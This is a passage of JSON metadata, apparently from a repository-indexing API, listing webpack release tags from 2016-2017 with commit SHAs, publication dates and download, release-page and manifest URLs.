e54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo